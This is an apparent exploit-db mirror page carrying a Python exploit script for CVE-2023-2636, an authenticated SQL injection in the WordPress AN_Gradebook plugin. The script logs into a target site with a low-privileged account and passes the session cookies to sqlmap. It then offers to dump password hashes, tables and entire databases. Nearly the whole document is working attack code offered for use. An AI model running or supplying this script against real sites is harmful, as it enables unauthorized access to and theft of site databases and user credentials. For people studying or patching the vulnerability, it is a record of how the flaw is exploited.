WordPress Plugin AN_Gradebook 5.0.1 – SQLi

  • 作者: Lukas Kinneberg
    日期: 2023-07-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51632/
  • #!/usr/bin/python3
    
    # Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
    # Date: 2023-07-26
    # Exploit Author: Lukas Kinneberg
    # Github: https://github.com/lukinneberg/CVE-2023-2636
    # Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
    # Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
    # Tested on: WordPress 6.2.2
    # CVE: CVE-2023-2636
    
    
    from datetime import datetime
    import json
    import os
    import shlex
    import subprocess

    import requests
    
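    # Flow: log in to WordPress with the supplied (low-privileged) account, collect
    # the resulting session cookies, and hand them to sqlmap for the ``course``
    # admin-ajax action. Everything below runs at import time: this is a script,
    # not a library.

    # User Input:
    # ``course_id`` is the value of the ``id`` parameter that sqlmap tests; the
    # original script hard-coded 3, change it to a course that exists on the target.
    target_ip = 'CHANGE_THIS'
    target_port = '80'
    username = 'hacker'
    password = 'hacker'
    course_id = '3'

    banner = '''
    
     ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
    ||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
    ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
    |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
    		Exploit Author: Lukas Kinneberg
    
    '''

    print(banner)

    print('[*] Starting Exploit at: ' + datetime.now().strftime('%H:%M:%S'))

    # Authentication:
    # The initial GET lets the login form set its test cookie on the session
    # before the credentials are POSTed.
    session = requests.Session()
    base_url = 'http://' + target_ip + ':' + target_port
    auth_url = base_url + '/wp-login.php'
    session.get(auth_url)

    # Header:
    header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
    }

    # Body:
    body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
    }
    session.post(auth_url, headers=header, data=body)

    # requests follows the post-login redirect, so the response status is not a
    # useful success signal; the ``wordpress_logged_in_*`` cookie WordPress sets
    # on a successful login is. Stop here instead of handing sqlmap an
    # anonymous session and producing a misleading "not injectable" result.
    cookies_session = session.cookies.get_dict()
    if not any(name.startswith('wordpress_logged_in') for name in cookies_session):
        raise SystemExit('[-] Login failed for user ' + repr(username) + ': no wordpress_logged_in cookie was set')

    # SQL-Injection (Exploit):
    # sqlmap expects the cookie jar as one ``name=value; name=value`` string.
    # Joining the pairs directly replaces the original json.dumps()/replace()
    # chain, which also rewrote ':' and ' ' inside cookie values.
    cookie = '; '.join(name + '=' + value for name, value in cookies_session.items())

    # SQLMAP Printout
    sqlmap_options = [
        ('-a, --all', 'Retrieve everything'),
        ('-b, --banner', 'Retrieve DBMS banner'),
        ('--current-user', 'Retrieve DBMS current user'),
        ('--current-db', 'Retrieve DBMS current database'),
        ('--passwords', 'Enumerate DBMS users password hashes'),
        ('--tables', 'Enumerate DBMS database tables'),
        ('--columns', 'Enumerate DBMS database table column'),
        ('--schema', 'Enumerate DBMS schema'),
        ('--dump', 'Dump DBMS database table entries'),
        ('--dump-all', 'Dump all DBMS databases tables entries'),
    ]
    print('Sqlmap options:')
    for flag, description in sqlmap_options:
        print(' {0:<16}{1}'.format(flag, description))
    retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')

    # Build the argument vector instead of a shell string: neither the typed
    # option nor any cookie value is re-parsed by a shell this way. The
    # interactive answer is split with shlex so "--dump -D wordpress"-style input
    # still becomes separate arguments.
    exploitcode = [
        'sqlmap',
        '-u', base_url + '/wp-admin/admin-ajax.php?action=course&id=' + course_id,
        '--level', '2', '--risk', '2',
        '--cookie=' + cookie,
    ]
    exploitcode += shlex.split(retrieve_mode)
    exploitcode += ['-p', 'id', '-v', '0', '--answers=follow=Y', '--batch']

    print('[*] Payload for SQL-Injection:')
    print(' '.join(shlex.quote(arg) for arg in exploitcode))

    try:
        # sqlmap's own exit status is reported below rather than raised, so a
        # non-zero exit from sqlmap does not end in a traceback.
        result = subprocess.run(exploitcode)
    except FileNotFoundError:
        raise SystemExit('[-] sqlmap was not found on PATH; install it or run the printed command manually')
    print('Exploit finished at: ' + datetime.now().strftime('%H:%M:%S')
          + ' (sqlmap exit status ' + str(result.returncode) + ')')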